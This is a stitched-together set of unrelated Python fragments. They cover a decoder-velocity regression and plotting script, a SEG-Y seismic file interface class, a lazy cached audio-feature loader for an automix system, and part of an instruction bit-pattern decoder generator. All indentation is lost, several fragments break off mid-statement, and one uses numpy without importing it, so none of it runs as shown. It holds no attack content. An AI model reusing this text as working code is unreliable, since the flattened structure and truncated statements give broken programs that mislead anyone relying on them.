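# plot_results(R)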
import scipy.stats
import matplotlib.pyplot as plt
def plot_results(RRD):
### Raw Velocities ###
for i in range(7):
s, ii, r, p, e = scipy.stats.linregress(RRD.raw_vel[:-1, i], RRD.raw_command[:, i])
print('raw vel: {}, r2 = {}'.format(i, r**2))
print('')
print('')
print('')
### Presafe Velocities ###
for i in range(7):
s, ii, r, p, e = scipy.stats.linregress(RRD.pre_safe_vel[:-1, i], RRD.pre_safe_command[:, i])
print('presafe vel: {}, r2 = {}'.format(i, r**2))
#f, ax = plt.subplots()
#ax.plot(RRD.pre_safe_vel[:, i])
#ax.plot(RRD.pre_safe_command[:, i])
print('')
print('')
print('')
#### Proc Velocities ###
for i in range(7):
s, ii, r, p, e = scipy.stats.linregress(RRD.sent_vel[:-1, i], RRD.proc_command[:, i])
print('proc vel: {}, r2 = {}'.format(i, r**2))
f, ax = plt.subplots()
ax.plot(RRD.proc_command[:, i])
ax.plot(RRD.sent_vel[:, i])
print('')
print('')
print('')
wsxy = np.array([0.5, ])
wpsi = np.array([0.01])
wsang = np.array([0.005])
ws = np.hstack((wsxy.reshape(-1, 1), wpsi.reshape(-1, 1), wsang.reshape(-1, 1)))
def sweep_W(R, ws=ws):
ax = []
ax2 = []
for i in range(7):
f, axi = plt.subplots()
axi.plot(R.pre_safe_command[:, i], label='og, presafe')
ax.append(axi)
#f, axi = plt.subplots()
axi.plot(R.raw_command[:, i], label='og, raw')
#ax2.append(axi)
for i, (xy, psi, ang) in enumerate(ws):
R = change_W(R, xy, psi, ang)
R = def_LPF(R, 5)
R.run_decoder()
for j in range(7):
axi = ax[j]
axi.plot(R.raw_vel[:, j], label=str(xy)+','+str(ang)+' raw ')
#axi = ax2[j]
axi.plot(R.pre_safe_vel[:, j], label=str(xy)+','+str(ang)+' presafe ')
def change_W(RRD, w_vel_xy, w_vel_psi, w_vel_ang):
for i in [7, 8]:
RRD.dec.filt.W[i, i] = w_vel_xy
RRD.dec.filt.W[9, 9] = w_vel_psi
for i in [10, 11, 12]:
RRD.dec.filt.W[i, i] = w_vel_ang
return RRD
def def_LPF(RRD, lpf_cutoff):
fs_synch = 20
nyq = | |
<filename>pygeopressure/basic/seisegy.py
# -*- coding: utf-8 -*-
"""
class for interfacing with segy file.
Created on Feb. 7th 2018
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
__author__ = "yuhao"
from builtins import range, open
import json
from shutil import copyfile
from itertools import product
from future.utils import native
import segyio
import numpy as np
import pandas as pd
from tqdm.auto import tqdm
from .utils import methdispatch
from .vawt import wiggles, img
from .indexes import InlineIndex, CrlineIndex, DepthIndex, CdpIndex
from .survey_setting import SurveySetting
from .threepoints import ThreePoints
from . import Path
class SeiSEGY(object):
def __init__(self, segy_file, like=None):
"""
Parameters
----------
segy_file : str
segy file path
like : str, optional
created segy file has the same dimensions as `like`.
"""
self.segy_file = segy_file
self.inDepth = False # True if dataset Z is in Depth
self.property_type = None
if like is not None:
if Path(native(like)).exists() and not Path(native(self.segy_file)).exists():
copyfile(src=like, dst=self.segy_file)
if Path(native(self.segy_file)).exists():
self._parse_segy()
else:
raise Exception("File does not exist!")
@classmethod
def from_json(cls, json_file, segy_file=None):
"""
Initialize SeiSEGY from an json file containing information
Parameters
----------
json_file : str
json file path
segy_file : str
segy file path for overriding information in json file.
"""
with open(json_file, 'r') as fl:
json_object = json.load(fl)
segy = json_object["path"]
inDepth = json_object["inDepth"]
property_type = json_object["Property_Type"]
if segy_file:
segy = segy_file
instance = cls(native(segy))
instance.inDepth = inDepth
instance.property_type = property_type
return instance
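# The json file consumed by from_json() is expected to carry at least these keys
# (the values shown here are illustrative only):
#   {"path": "velocity.sgy", "inDepth": true, "Property_Type": "velocity"}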
def __str__(self):
return "SeiSEGY(inl[{},{},{}];crl[{},{},{}];z[{},{},{}])".format(
self.startInline, self.endInline, self.stepInline,
self.startCrline, self.endCrline, self.stepCrline,
self.startDepth, self.endDepth, self.stepDepth)
def _parse_segy(self):
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
self.startInline = segyfile.ilines[0]
self.endInline = segyfile.ilines[-1]
self.nEast = len(segyfile.ilines)
self.stepInline = (self.endInline - self.startInline) // \
(self.nEast - 1)
self.startCrline = segyfile.xlines[0]
self.endCrline = segyfile.xlines[-1]
self.nNorth = len(segyfile.xlines)
self.stepCrline = (self.endCrline - self.startCrline) // \
(self.nNorth - 1)
self.startDepth = segyfile.samples[0]
self.endDepth = segyfile.samples[-1]
self.nDepth = len(segyfile.samples)
self.stepDepth = (self.endDepth - self.startDepth) // \
(self.nDepth - 1)
inline_A = self.startInline
crline_A = self.startCrline
index_A = 0
x_A = segyfile.header[index_A][segyio.su.cdpx]
y_A = segyfile.header[index_A][segyio.su.cdpy]
inline_B = inline_A
crline_B = self.startCrline + 2 * self.stepCrline
index_B = 2
x_B = segyfile.header[index_B][segyio.su.cdpx]
y_B = segyfile.header[index_B][segyio.su.cdpy]
inline_C = self.startInline + 2 * self.stepInline
crline_C = crline_B
index_C = 2 * self.nNorth + 2
x_C = segyfile.header[index_C][segyio.su.cdpx]
y_C = segyfile.header[index_C][segyio.su.cdpy]
setting_dict = {
"inline_range": [
self.startInline, self.endInline, self.stepInline],
"crline_range": [
self.startCrline, self.endCrline, self.stepCrline],
"z_range": [
self.startDepth, self.endDepth, self.stepDepth, "unknown"],
"point_A": [inline_A, crline_A, x_A, y_A],
"point_B": [inline_B, crline_B, x_B, y_B],
"point_C": [inline_C, crline_C, x_C, y_C]
}
self.survey_setting = SurveySetting(ThreePoints(setting_dict))
def inlines(self):
"""
Iterator for inline numbers
Yields
------
int
inline number
"""
for inline in range(self.startInline, self.endInline+1, self.stepInline):
yield inline
def crlines(self):
"""
Iterator for crline numbers
Yields
------
int
cross-line number
"""
for crline in range(self.startCrline, self.endCrline+1, self.stepCrline):
yield crline
def inline_crlines(self):
"""
Iterator for both inline and crline numbers
Yields
------
tuple of int
(inline number, crossline number)
"""
for inline, crline in product(
range(self.startInline, self.endInline+1, self.stepInline),
range(self.startCrline, self.endCrline+1, self.stepCrline)):
yield (inline, crline)
def depths(self):
"""
Iterator for z coordinate
Yields
------
float
depth value
"""
for i in range(self.nDepth):
yield self.startDepth + i * self.stepDepth
def inline(self, inline):
"data of a inline section"
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
data = segyfile.iline[inline]
return data
def crline(self, crline):
"data of a crossline section"
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
data = segyfile.xline[crline]
return data
def depth(self, depth):
"data of a depth slice"
depth_idx = int((depth - self.startDepth) // self.stepDepth)
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
data = segyfile.depth_slice[depth_idx]
return data
def cdp(self, cdp):
"data of a cdp"
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
data = segyfile.gather[cdp]
data = data.reshape((data.shape[-1],))
return data
@methdispatch
def data(self, indexes):
"""
Retrieve Data according to the index provided.
Parameters
----------
indexes : {InlineIndex, CrlineIndex, DepthIndex, CdpIndex}
index of data to retrieve
Returns
-------
numpy.ndarray
"""
raise TypeError("Unsupported Type")
@data.register(InlineIndex)
def _(self, indexes):
"""
data of a Inline section
Parameters
----------
indexes : InlineIndex
Returns
-------
out : 2-d ndarray
of size nCrline * nDepth
"""
return self.inline(indexes.value)
@data.register(CrlineIndex)
def _(self, indexes):
"""
data of a Crossline section
Parameters
----------
indexes : CrlineIndex
Returns
-------
out : 2-d ndarray
of size nInline * nDepth
"""
return self.crline(indexes.value)
@data.register(DepthIndex)
def _(self, indexes):
"""
data of a depth slice
Parameters
----------
indexes : DepthIndex
Returns
-------
out : 2-d ndarray
of size nInline * nCrline
"""
return self.depth(indexes.value)
@data.register(CdpIndex)
def _(self, indexes):
"""
data of a cdp
Parameters
----------
indexes : CdpIndex
Returns
-------
out : 1-d ndarray
of length nDepth
"""
return self.cdp(indexes.value)
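# Usage sketch (index values are placeholders; `seis` stands for a SeiSEGY instance):
#   seis.data(InlineIndex(400))      -> 2-d array of shape (nCrline, nDepth)
#   seis.data(DepthIndex(2000))      -> 2-d array of shape (nInline, nCrline)
#   seis.data(CdpIndex((400, 600)))  -> 1-d array of length nDepth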
def update(self, index, data):
"""
Update data with ndarray
Parameters
----------
index : InlineIndex
data : 2-d ndarray
data for updating Inline
"""
try:
if not isinstance(index, InlineIndex):
raise TypeError("has to be InlineIndex")
if data.shape != (self.nNorth, self.nDepth):
raise ValueError
with segyio.open(self.segy_file, 'r+') as segyfile:
segyfile.mmap()
segyfile.iline[index.value] = data
except Exception as er:
print(er)
@methdispatch
def plot(self, index, ax, kind='vawt', cm='seismic', ptype='seis'):
"""
Plot seismic section according to index provided.
Parameters
----------
index : {InlineIndex, CrlineIndex, DepthIndex, CdpIndex}
index of data to plot
ax : matplotlib.axes._subplots.AxesSubplot
axis to plot on
kind : {'vawt', 'img'}
'vawt' for variable area wiggle trace plot
'img' for variable density plot
cm : str
colormap for plotting
ptype : str, optional
property type
Returns
-------
matplotlib.image.AxesImage
"""
raise TypeError('Unsupported index type')
@plot.register(InlineIndex)
def _(self, index, ax, kind='vawt', cm='seismic', ptype='seis'):
data = self.data(index)
handle = None
if kind == 'vawt':
wiggles(data.T, wiggleInterval=1, ax=ax)
elif kind == 'img':
handle = img(data.T,
extent=[
self.startCrline, self.endCrline,
self.startDepth, self.endDepth],
ax=ax, cm=cm, ptype=ptype)
ax.invert_yaxis()
else:
pass
ax.get_figure().suptitle('In-line Section: {}'.format(index.value))
from matplotlib.offsetbox import AnchoredText
z_text = AnchoredText(
r"$\downarrow$Z",
loc=2, prop=dict(size=10), frameon=False,
bbox_to_anchor=(0., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(z_text)
inline_text = AnchoredText(
r"Cross-line $\rightarrow$ ",
loc=1, prop=dict(size=10), frameon=False,
bbox_to_anchor=(1., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(inline_text)
return handle
@plot.register(CrlineIndex)
def _(self, index, ax, kind='vawt', cm='seismic', ptype='seis'):
data = self.data(index)
handle = None
if kind == 'vawt':
wiggles(data.T, wiggleInterval=1, ax=ax)
elif kind == 'img':
handle = img(data.T,
extent=[
self.startInline, self.endInline,
self.startDepth, self.endDepth],
ax=ax, cm=cm, ptype=ptype)
ax.invert_yaxis()
else:
pass
ax.get_figure().suptitle('Cross-line Section: {}'.format(index.value))
from matplotlib.offsetbox import AnchoredText
z_text = AnchoredText(
r"$\downarrow$Z",
loc=2, prop=dict(size=10), frameon=False,
bbox_to_anchor=(0., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(z_text)
inline_text = AnchoredText(
r"In-line $\rightarrow$ ",
loc=1, prop=dict(size=10), frameon=False,
bbox_to_anchor=(1., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(inline_text)
return handle
@plot.register(DepthIndex)
def _(self, index, ax, kind='vawt', cm='seismic', ptype='seis'):
data = self.data(index)
handle = None
if kind == 'vawt':
wiggles(data.T, wiggleInterval=1, ax=ax)
elif kind == 'img':
handle = img(data.T,
extent=[
self.startInline, self.endInline,
self.startCrline, self.endCrline,],
ax=ax, cm=cm, ptype=ptype)
ax.invert_yaxis()
else:
pass
ax.get_figure().suptitle("Z slice: {}".format(index.value))
from matplotlib.offsetbox import AnchoredText
z_text = AnchoredText(
r"$\downarrow$Cross-line",
loc=2, prop=dict(size=10), frameon=False,
bbox_to_anchor=(0., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(z_text)
inline_text = AnchoredText(
r"In-line $\rightarrow$ ",
loc=1, prop=dict(size=10), frameon=False,
bbox_to_anchor=(1., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(inline_text)
return handle
def valid_cdp(self, cdp_num):
"Return valid CDP numbers nearest to cdp_num"
inl_num, crl_num = cdp_num
n_inline = (inl_num - self.startInline) // self.stepInline
in_plus_one = round(((inl_num - self.startInline) % self.stepInline) / \
self.stepInline)
inline = self.startInline + (n_inline + in_plus_one) * self.stepInline
n_crline = (crl_num - self.startCrline) // self.stepCrline
cr_plus_one = round(((crl_num - self.startCrline) % self.stepCrline) / \
self.stepCrline)
crline = self.startCrline + (n_crline + cr_plus_one) * self.stepCrline
return (inline, crline)
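    # Worked example (illustrative values only): with startInline=100, stepInline=4,
    # startCrline=300 and stepCrline=2, valid_cdp((107, 304)) returns (108, 304):
    # 107 is rounded to the nearest in-line 108, while 304 already lies on the
    # cross-line grid.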
def to_gslib(self, attr, fname, cdps=None):
"""
Output attributes to a gslib data file.
        A description of this file format can be found at
        http://www.gslib.com/gslib_help/format.html
        Parameters
        ----------
        attr : str
attribute name
fname : str
file name
cdps : list of tuples
cdps to export
"""
try:
if cdps is None:
info = "Number of cells: [{},{},{}] ".format(
self.nEast, self.nNorth, self.nDepth) + \
"Cell dimensions: [{},{},{}] ".format(
self.stepInline, self.stepCrline, self.stepDepth) + \
"Origin: [{}, {}, {}]".format(
self.startInline, self.startCrline, self.startDepth)
with open(fname, 'w') as fout:
fout.write("{}\n4\nx\ny\nz\n{}\n".format(info, attr))
nInline = len(list(self.inlines()))
for i, inl in enumerate(
tqdm(self.inlines(), total=nInline, ascii=True)):
data_per_inline = self.inline(inl).flatten()
inline_per_inline = [inl] * data_per_inline.shape[0]
crline_per_inline = np.array(
[[cl]*self.nDepth for cl in self.crlines()]).flatten()
depth_per_inline = np.array(
[d for d in self.depths()] * self.nNorth).flatten()
temp_frame = pd.DataFrame(
{'col1': inline_per_inline,
'col2': crline_per_inline,
'col3': depth_per_inline,
'col4': data_per_inline})
temp_frame.to_csv(
fname, mode='a', index=False, sep=str(' '),
header=False)
else:
info = "CDPs: {}".format(cdps)
with open(fname, 'w') as fout:
fout.write("{}\n4\nx\ny\nz\n{}\n".format(info, attr))
for cdp in tqdm(cdps, ascii=True):
data_per_cdp = self.cdp(cdp)
depth_per_cdp = list(self.depths())
n_depth = len(list(self.depths()))
inl, | |
"""
Container for the class Track
"""
import collections
import copy
import logging as log
import os
import time
from typing import List
import librosa
import numpy as np
from pkg_resources import resource_filename
from automix import config
from automix.model.inputOutput.serializer.featureSerializer import \
FeatureSerializer
# TODO:
# handle parameters training
class featuresGetter(dict):
"""
Lazy loader of features
    Implements dict and calls the estimator if the key is known but no value is cached.
"""
def __init__(self, filename):
"""
        -filename: name/path of the track used to infer the path of the cache
"""
self._path = filename
self["path"] = filename # TODO This is not explicit and hard to understand
self._estimators = self.getExecutionGraph()
super().__init__()
def getExecutionGraph(self):
"""
        Create the graph containing all the usable estimators and the dependency links between them
"""
        # TODO: Do we use estimators instead of strings for dependencies?
        # The dependency doesn't know which parameter was set for the input.
from automix.featureExtraction.lowLevel.readFile import ReadFile, GetDuration
from automix.featureExtraction.lowLevel.cqt import Cqt
from automix.featureExtraction.lowLevel.pcp import Pcp
from automix.featureExtraction.lowLevel.coreFinder import CoreFinder
from automix.featureExtraction.lowLevel.replayGain import ReplayGain
from automix.featureExtraction.lowLevel.onsetDetection import OnsetDetection
from automix.featureExtraction.lowLevel.windowing import Windowing
from automix.featureExtraction.structure.msafProxy import MsafProxy
from automix.featureExtraction.beats.madmomBeatDetection import MadmomBeatDetection
from automix.featureExtraction.harmonicPercussiveClassification.hpss import Hpss
from automix.featureExtraction.vocalSeparation.vocalMelodyExtraction import VocalMelodyExtraction
from automix.featureExtraction.automaticDrumsTranscription.madmomDrumsProxy import MadmomDrumsProxy
import automix.featureExtraction.novelty as n
import automix.featureExtraction.lowLevel as ll
estimators: List[fe.Estimator] = [
ReadFile(),
GetDuration(),
MadmomBeatDetection(parameterSnapDistance=0.05),
VocalMelodyExtraction(),
Hpss(),
MadmomDrumsProxy(),
Cqt(parameterBinNumber=84, parameterScale="Perceived dB", outputCqt="cqtPerceiveddB"),
Pcp(parameterNieto=True),
Pcp(parameterNieto=False, outputPcp="chromagram"),
CoreFinder(),
MsafProxy(algorithm="scluster", feature=None, outputSignal="msaf-scluster"),
MsafProxy(algorithm="sf", feature="cqt", outputSignal="msaf-sf"),
MsafProxy(algorithm="olda", feature=None, outputSignal="msaf-olda"),
ReplayGain(inputGrid=None),
OnsetDetection()
]
def getPeakWorkflow(feature, sparse=False, windowPanning=0, forceRefreshCache=False, addZeroStart=True):
"""
            Create the graph of nodes to retrieve the peaks from any feature.
            - You can specify if the feature is sparse: the aggregation of the quantization will then be based on the sum
              instead of the RMSE
            - You can specify the panning of the quantization window in percentage of a strong beat
            - You can specify a name. If not, the name will be the name of the feature
            - You can use forceRefreshCache to recompute cached features (to be used if any extractor has been updated)
"""
name = feature
featureEstimators = [
Windowing(inputSamples=feature,
inputGrid="strongBeats",
output=name + "RMSE",
parameterAggregation="sum" if sparse else "rmse",
parameterPanning=windowPanning,
parameterSteps=1,
forceRefreshCache=forceRefreshCache),
ll.Normalize(inputSamples=name + "RMSE",
outputNormalizedSamples=name + "RMSENormalized",
forceRefreshCache=forceRefreshCache),
n.Checkerboard(
inputSamples=name + "RMSENormalized", # Checkerboard can be removed as it is replaced in getFeatureW
outputNovelty=name + "Checkerboard",
parameterAddZerosStart=addZeroStart,
forceRefreshCache=forceRefreshCache,
parameterWindowSize=16) # parameterWindowSize=16*8, forceRefreshCache=False),
]
return featureEstimators
estimators += getPeakWorkflow("samples")
estimators += getPeakWorkflow("chromagram", addZeroStart=False)
estimators += getPeakWorkflow("pcp", addZeroStart=False)
estimators += getPeakWorkflow("cqtPerceiveddB", addZeroStart=False)
estimators += getPeakWorkflow("harmonic")
estimators += getPeakWorkflow("percussive")
estimators += getPeakWorkflow("kick", sparse=True, windowPanning=0.21)
estimators += getPeakWorkflow("snare", sparse=True, windowPanning=0.21)
estimators += getPeakWorkflow("hihat", sparse=True, windowPanning=0.21)
def getFeatureW(features,
topPeaks=[None],
salienceThreshold=[0.4],
relativeDistance=[1],
inputSalience=["kickRMSENormalized", "harmonicRMSENormalized", "percussiveRMSENormalized"]):
"""
            Get the peak-picking estimators for the given features and parameters
"""
w = []
# Add all the novelty curves and independent peak picking
for feature in features:
# c = Checkerboard(inputSamples=feature + "RMSENormalized", outputNovelty=feature + "Checkerboard")
# c.parameters["addZerosStart"].fitStep = parameters[0] # [False, True]
# c.parameters["windowSize"].fitStep = parameters[1] # [8,32]
pp = ll.PeakPicking(inputSignal=feature + "Checkerboard", outputPeaks=feature + "CheckerboardPeaks")
pp.parameters["relativeThreshold"].fitStep = [0.3] # parameters[2] # [0.1,0.3]
pp.parameters["minDistance"].fitStep = [4] # parameters[3] # [8,32]
w += [pp]
# Compute the periodicity: 8 SB = 4 bars
p = ll.Periodicity(inputFeatures=[feature + "Checkerboard" for feature in features])
p.parameters["period"].fitStep = [8]
p.parameters["featureAggregation"].fitStep = ["quantitative"] # ["quantitative", "qualitative"]
p.parameters["distanceMetric"].fitStep = ["RMS"] # ["RMS", "sum", "Veire"]
w.append(p)
# Quantize the beats to the periodicity
for feature in features:
q = ll.Quantize(inputSignal=feature + "CheckerboardPeaks", outputSignal=feature + "Quantized")
q.parameters["maxThreshold"].fitStep = [0]
w += [q]
# Get the top peaks + minimum salience
ps = ll.PeakSelection(inputPeaks=[feature + "Quantized" for feature in features],
inputSalience=inputSalience,
parameterMergeFunction=np.mean)
ps.parameters["absoluteTop"].fitStep = topPeaks
ps.parameters["salienceTreshold"].fitStep = salienceThreshold
ps.parameters["relativeDistance"].fitStep = relativeDistance
w.append(ps)
return w
#"samples", "chromagram",
estimators += getFeatureW(
["pcp", "cqtPerceiveddB", "harmonic", "percussive", "kick", "snare", "hihat"],
inputSalience=["harmonicRMSENormalized"],
salienceThreshold=[0.4], #0.4 TODO: make that clear ?
topPeaks=[None],
relativeDistance=[1])
# from automix.model.inputOutput.serializer import GraphvizSerializer
# GraphvizSerializer().serializeEstimators(estimators)
return estimators
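    # Illustrative note on how this graph is consumed (names below follow the
    # outputs wired above; the track path is a placeholder and the exact output
    # names of MadmomDrumsProxy are assumed):
    #
    #     features = featuresGetter("/path/to/track.mp3")
    #     peaks = features["kickQuantized"]
    #
    # The lookup walks the estimator graph lazily: MadmomDrumsProxy -> Windowing
    # -> Normalize -> Checkerboard -> PeakPicking -> Quantize, computing or loading
    # from cache only what is missing.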
def __getitem__(self, key):
return self.getItem(key)
def getItem(self, key):
"""
        Return the feature from RAM.
        If it is not there, search for it on disk, put it in RAM and return it.
        If it is not on disk either, compute the feature, put it on disk and in RAM and return it.
        The method is not pure, but it is much simpler this way.
"""
from automix import config
# If an estimator has an input set to None
if key is None:
return
# Search in RAM
if self.__contains__(key) and super().__getitem__(key) is not None: #TODO add estimator.forceRefreshCache == False?
return super().__getitem__(key)
# Search on disk
estimator = self.getEstimator(key) # Get the estimator known to compute this feature
forceRefresh = estimator is not None and estimator.forceRefreshCache
cache = self.getCache(key, estimator)
if cache is not None and not forceRefresh:
self[key] = cache
# if config.CACHE_LEVEL >= estimator.cachingLevel:
# self.setCache(key, estimator, cache)
return cache
# Computes the feature
computed = self.computeFeature(estimator)
        estimator.forceRefreshCache = False  # TODO: this is to prevent multiple computations of a root estimator having multiple children
for i, subKey in enumerate(estimator.outputs): # an estimator has multiple outputs
if config.CACHE_LEVEL >= estimator.cachingLevel:
self.setCache(subKey, estimator, computed[i])
self[subKey] = computed[i]
return self[key]
def computeFeature(self, estimator):
"""
        Retrieve the feature by running the estimator's computation.
        The executed estimator might need more inputs, which will trigger more estimators as needed.
"""
# Run the estimator by searching for the input
# TODO this can create an infinite loop
input = [[self.getItem(f) for f in feature] if isinstance(feature, list) else self.getItem(feature)
for feature in estimator.inputs]
log.debug("computing " + str(estimator) + "->" + str(estimator.outputs) + " ...")
timerStart = time.process_time()
result = estimator.predictOne(*input)
log.debug(str(np.round(time.process_time() - timerStart, decimals=2)) + "s")
return result
def getEstimator(self, key):
"""Get the estimator known to compute this feature"""
estimator = [e for e in self._estimators if key in e.outputs]
if len(estimator) > 1:
raise Exception("graph of computation is not correct")
elif len(estimator) == 0:
return None
return estimator[0]
def propagateForceRefreshCache(self, estimator):
"""
        Set forceRefreshCache to True for the estimator and all downstream estimators in the computational graph
"""
estimator.forceRefreshCache = True
for output in np.hstack(estimator.outputs):
self.pop(output, None)
for e in [e for e in self._estimators if output in np.hstack(e.inputs)]:
self.propagateForceRefreshCache(e) #TODO: Slow computation..
def getCache(self, key, estimator):
"""
        Retrieve the cached data of the feature for this track, or return None
"""
cachePath = self.getCachePath(key)
cache = FeatureSerializer.deserialize(cachePath)
if cache is not None and cache["estimator"] == str(estimator):
return cache["value"]
else:
return None
def setCache(self, key, estimator, value):
"""
Set the data in cache.
        Uses the feature's name and the estimator (with parameters) to discriminate the stored information
"""
cachePath = self.getCachePath(key)
FeatureSerializer.serialize(cachePath, {"estimator": str(estimator), "value": value})
def getCachePath(self, key):
return resource_filename("automix", config.CACHE_LOCATION + config._getFilename(self._path) + "." + key + ".json")
class Track(object):
'''
Class used as a data structure associated with a track.
We store all the metadata/features of the track here.
Try to keep all the units in seconds or beats
    Use the TrackBuilder to instantiate it.
'''
def __init__(self, path="", name="", sourceType="", length=100, position=0, soffs=0, playRate=1, populateFeatures=True):
# features extracted
if populateFeatures:
            self.features = featuresGetter(path)  # features dictionary from the MIR estimators
# metadatas for the player
self.path = path # Path to the audio
self.name = name if name != "" else config._getFilename(path) # name of the music
self.sourceType = sourceType if sourceType else self.getSourceType() # sourceType for Reaper (see Track.getFileType)
# length of the track actually played by the player (it can be less or more than the duration)
self.length = length
# location of the item in the deck (global timestamp)
self.position = position
self.soffs = soffs # Start in source
self.playRate = playRate # playback rate in ratio. 0.5 is half the speed
self.preservePitch = 0 # boolean saying if the pitch should be preserved when changing the playback rate
        # Fade in and out of the track without using the deck effects. NOT supported by everything.
self.fadeIn = 0.01
self.fadeOut = 0.01
self.stretchMarkers = [] | |
= [ (trimmed_vals,ii) ]
else:
d[ other ].append((trimmed_vals,ii) )
#msge("RETURNING FROM PARTITION: %s" % ( str(d.keys())))
return (d, list(all_values.keys()) )
def all_same_operand_decider(ilist,bitpos):
"""Return false if not all of the next bits are the same
operand-decider, also return operand decider if True"""
last = None
for i in ilist:
plen = len(i.ipattern.bits)
if bitpos >= plen:
#msge("Fell off end of bits")
return (False,None)
# They can have different required values, but they must be the
# same deciding token.
if i.ipattern.bits[bitpos].is_operand_decider():
            if last is None:
last = i.ipattern.bits[bitpos]
elif last.token != i.ipattern.bits[bitpos].token:
return (False, None)
else:
return (False, None) # not an operand decider
if last:
return (True, last)
return (False, None)
def all_same_nonterminal(ilist,bitpos):
"""Return false if not all of the next bits are the same
nonterminal, also return nonterminal if True"""
last_nonterminal = None
for i in ilist:
plen = len(i.ipattern.bits)
if bitpos >= plen:
#msge("Fell off end of bits")
return (False,None)
if i.ipattern.bits[bitpos].is_nonterminal():
            if last_nonterminal is None:
last_nonterminal = i.ipattern.bits[bitpos]
elif last_nonterminal != i.ipattern.bits[bitpos]:
#msge("Differing NTs: [" + str(last_nonterminal)+ "] vs ["
#+ str(i.ipattern.bits[bitpos]) + ']')
return (False, None)
else:
#msge("Not a nonterminal")
return (False, None) # not a nonterminal
if last_nonterminal:
return (True, last_nonterminal)
return (False, None)
def move_candidate_od_to_front(bitpos, candidate_od, bit_info_t_list):
"""Move a speicific od names candidate_od from wherever it is in
the list (after bitpos) to the location bitpos"""
found = False
for i,b in enumerate(bit_info_t_list[bitpos+1:]):
if b.is_operand_decider():
if b.token == candidate_od:
found = True
badpos = i + bitpos + 1
if found:
# move bit_info_t_list[badpos] to just before bitpos
if vrearrange():
msge("BEFORE REARRANGE: bitpos = %d and badpos = %d" %
(bitpos, badpos))
for b in bit_info_t_list:
msge( "\t" + str(b) )
z = bit_info_t_list[badpos]
del bit_info_t_list[badpos]
bit_info_t_list.insert(bitpos,z)
if vrearrange():
msge("AFTER REARRANGE:")
for b in bit_info_t_list:
msge( "\t" +str(b) )
return found
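# Worked example of the rearrangement (pure list mechanics, values illustrative):
# with bit_info_t_list conceptually [A, B, C, D], bitpos=1 and the matching operand
# decider found at badpos=3, element D is deleted from index 3 and re-inserted at
# index 1, giving [A, D, B, C].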
def renumber_one_ipattern(i):
bitpos = 0
for p in i.ipattern.bits:
p.pbit = bitpos
bitpos = bitpos + 1
def renumber_bitpos(ilist):
for i in ilist:
renumber_one_ipattern(i)
def rearrange_at_conflict(ilist,bitpos):
"""Try to rearrange ODs at a conflict"""
# build up a list of candidate ods
# FIXME 2008-11-12 <NAME>: could search for all sequential
# ODs rather than just one neighboring OD.
candidate_ods = []
for i in ilist:
if bitpos >= len(i.ipattern.bits):
return False
if i.ipattern.bits[bitpos].is_operand_decider():
t = i.ipattern.bits[bitpos].token
if t not in candidate_ods:
candidate_ods.append(t)
# look ahead one spot too...
nbitpos = bitpos+1
if nbitpos < len(i.ipattern.bits):
if i.ipattern.bits[nbitpos].is_operand_decider():
t = i.ipattern.bits[nbitpos].token
if t not in candidate_ods:
candidate_ods.append(t)
if len(candidate_ods) == 0:
msge("REARRANGE: NO CANDIDATE OD")
return False
retry = True
for candidate_od in candidate_ods:
if retry == False:
break
msge("REARRANGE ATTEMPT using %s" % (candidate_od))
retry = False
for i in ilist:
if i.ipattern.bits[bitpos].is_operand_decider():
if candidate_od == i.ipattern.bits[bitpos].token:
msge("\tSKIPPING %s inum %d -- already fine" %
( i.get_iclass(), i.inum))
else:
msge("\tREARRANGE needs to juggle: %s inum %d" %
( i.get_iclass(), i.inum))
# attempt to juggle ODs in i.ipattern.bits to get
# candidate_od in to bitpos
if move_candidate_od_to_front(bitpos,
candidate_od,
i.ipattern.bits):
msge("\tREARRANGE one pattern worked for %s inum %d" %
( i.get_iclass(), i.inum))
else:
retry = True
msge("\tREARRANGE FAILED for %s. Trying again..." %
(candidate_od))
break # hit the outer loop
if retry == True:
msge("REARRANGE FAILED for all ODs")
return False
# make sure they are all the same OD at this bitpos now
candidate_od = None
for i in ilist:
if i.ipattern.bits[bitpos].is_operand_decider():
if candidate_od == None:
candidate_od = i.ipattern.bits[bitpos].token
elif candidate_od != i.ipattern.bits[bitpos].token:
msge("REARRANGE FAILED AT END(1)! bitpos = %d" % (bitpos))
msge( i.dump_str() )
return False
else:
print_node(ilist)
msge("REARRANGE FAILED AT END(2)!")
return False
msge("REARRANGE: FIXED OD CONFLICT!")
# since we rearranged, we need to renumber the pbits or the
# extraction will not work properly.
renumber_bitpos(ilist)
return True
def some_funky_spot(ilist,bitpos):
"""Return true if some pattern has a nonterminal or operand decider"""
for i in ilist:
if bitpos < len(i.ipattern.bits):
if i.ipattern.bits[bitpos].is_nonterminal():
return True
if i.ipattern.bits[bitpos].is_operand_decider():
return True
return False
def print_split(others,ones,zeros,brief=False):
for s,lst in [('Others',others),
('Ones', ones),
('Zeros', zeros)]:
msge(s +': ')
for ii in lst:
try:
msge( ii.dump_str(brief=brief))
except:
msge( "XUNKNOWN: " + str(ii) )
def partition_nodes(ilist,bitpos):
"""return a tuple of lists of nodes whose next bit is zero, one or
a letter (others)"""
zeros = []
ones = []
others = []
zero = '0'
one= '1'
for inst in ilist:
bit = inst.ipattern.bits[bitpos]
if bit.value == zero:
zeros.append(inst)
elif bit.value == one:
ones.append(inst)
else:
others.append(inst)
return (ones,zeros,others)
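# Illustrative example: for three patterns whose bit at bitpos is '1', '0' and a
# placeholder letter (e.g. a don't-care 'm'), partition_nodes returns the tuple
# (ones, zeros, others) = ([inst_1], [inst_0], [inst_letter]).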
def print_node(ilist):
for ii in ilist:
msge("\t" + ii.dump_str(brief=True))
def at_end_of_instructions(ilist, bitpos):
"""If all instructions are done with their bits, return 1
None). Check for length problems too. If not done, return 0.
If there is an error, return -1"""
done = False
notdone = False
for ii in ilist:
if isinstance(ii,tuple):
die("Bad tuple where instruction expected: "+ str(ii))
